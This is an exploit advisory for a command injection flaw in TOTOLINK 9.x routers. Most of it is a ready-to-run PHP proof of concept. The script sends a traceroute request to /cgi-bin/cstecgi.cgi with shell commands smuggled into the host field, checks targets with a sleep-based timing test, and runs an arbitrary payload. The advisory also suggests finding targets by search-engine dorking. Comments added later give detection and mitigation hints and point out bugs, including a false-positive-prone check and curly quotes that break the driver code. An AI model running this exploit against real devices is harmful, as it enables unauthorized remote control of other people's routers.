Headline
TOTOLINK 9.x Command Injection
TOTOLINK version 9.x suffers from a remote command injection vulnerability.
=============================================================================================================================================
| # Title : TOTOLINK 9.x Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://www.totolink.net/ |
=============================================================================================================================================
POC :
[+] Dorking in Google or other search engine.
[+] Uses cURL to allow remote commands.
[+] Line 71: set your target.
[+] save code as poc.php .
[+] Usage : cmd => c:\www\test\php poc.php
[+] PayLoad :
<?php
/**
 * Proof-of-concept client for the TOTOLINK command-injection issue described in the headline.
 *
 * Every request goes to `<targetUri>/cgi-bin/cstecgi.cgi` as a JSON body whose
 * "topicurl" is "setTracerouteCfg" and whose "command" field carries
 * "127.0.0.1; <cmd>;#". Presumably the traceroute host value reaches a shell
 * unvalidated, so the `;` ends the intended command and `#` comments out the rest.
 *
 * Defender notes (derived only from what this class sends):
 *  - Detection: POSTs to /cgi-bin/cstecgi.cgi with topicurl "setTracerouteCfg"
 *    whose "command" value contains shell metacharacters (`;`, `#`, whitespace)
 *    are not plausible traceroute hosts. The body is JSON while the request
 *    header claims application/x-www-form-urlencoded, a second anomaly worth
 *    alerting on.
 *  - Mitigation: validate the host field against an allow-list of IP/hostname
 *    characters and never pass it through a shell; keep the management CGI
 *    off untrusted networks until a vendor fix is applied.
 */
class TotolinkExploit {
// Base URL of the device (scheme + host), no trailing path.
private $targetUri;
// Seconds used by check() for the timing-based (blind) test; default 3.
private $sleepTime;
public function __construct($targetUri, $sleepTime = 3) {
$this->targetUri = $targetUri;
$this->sleepTime = $sleepTime;
}
// Function to send POST request and execute the command on the target
// `$cmd` is embedded verbatim between "127.0.0.1; " and ";#", i.e. it reaches
// the device unescaped. `num` is a random 1..500 value sent alongside; its
// meaning to the device is not established by this file. Returns whatever
// sendPostRequest() returns (response body, or false on failure).
public function executeCommand($cmd) {
$num = rand(1, 500);
$url = $this->targetUri . '/cgi-bin/cstecgi.cgi';
$data = json_encode([
"command" => "127.0.0.1; {$cmd};#",
"num" => $num,
"topicurl" => "setTracerouteCfg"
]);
// Send POST request
return $this->sendPostRequest($url, $data);
}
// Check if the target is vulnerable
// Two stages: (1) the response to "echo test" must contain the substring
// 'success'; (2) a "sleep N" request must take at least N seconds round trip.
// Stage 2 measures wall-clock time including network latency and the HTTP
// timeout, so a slow or unresponsive host can satisfy
// `$elapsedTime >= $this->sleepTime` without any injection having happened
// (false positive). Returns a human-readable status string in every branch.
public function check() {
echo "Checking if the target can be exploited.\n";
// Test using echo command to see if it's vulnerable
$response = $this->executeCommand("echo test");
// `!$response` covers the false returned by file_get_contents() on failure.
if (!$response || strpos($response, 'success') === false) {
return "Target is likely not vulnerable.\n";
}
// Test command injection using sleep
echo "Performing command injection test with sleep of {$this->sleepTime} seconds.\n";
$start = microtime(true);
$this->executeCommand("sleep {$this->sleepTime}");
$elapsedTime = microtime(true) - $start;
echo "Elapsed time: " . round($elapsedTime, 2) . " seconds.\n";
if ($elapsedTime >= $this->sleepTime) {
return "Target is vulnerable: Blind command injection successful.\n";
}
return "Command injection test failed.\n";
}
// Exploit the vulnerability to run the payload
// Sends `$payload` through executeCommand(); the response is discarded and
// nothing is returned.
public function exploit($payload) {
echo "Executing payload on the target.\n";
$this->executeCommand($payload);
}
// Helper function to send POST requests
// Uses PHP's http stream wrapper (not cURL, despite the advisory text).
// The Content-Type header says form-urlencoded while `$postFields` is the JSON
// string built by executeCommand(). No timeout is set in the context, so PHP's
// default socket timeout applies. Returns the body as a string, or false on
// failure (file_get_contents() emits a warning rather than throwing).
private function sendPostRequest($url, $postFields) {
$options = [
'http' => [
'method' => 'POST',
'header' => 'Content-Type: application/x-www-form-urlencoded',
'content' => $postFields
]
];
$context = stream_context_create($options);
return file_get_contents($url, false, $context);
}
}
// Example of usage
// Driver: constructs the client against a placeholder URL, prints the result
// of the timing-based check(), then sends a single payload whose response is
// not displayed.
$targetUri = 'http://target-ip’; // Replace with actual target URL
$exploit = new TotolinkExploit($targetUri);
echo $exploit->check();
$exploit->exploit(‘whoami’); // Replace with your payload
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================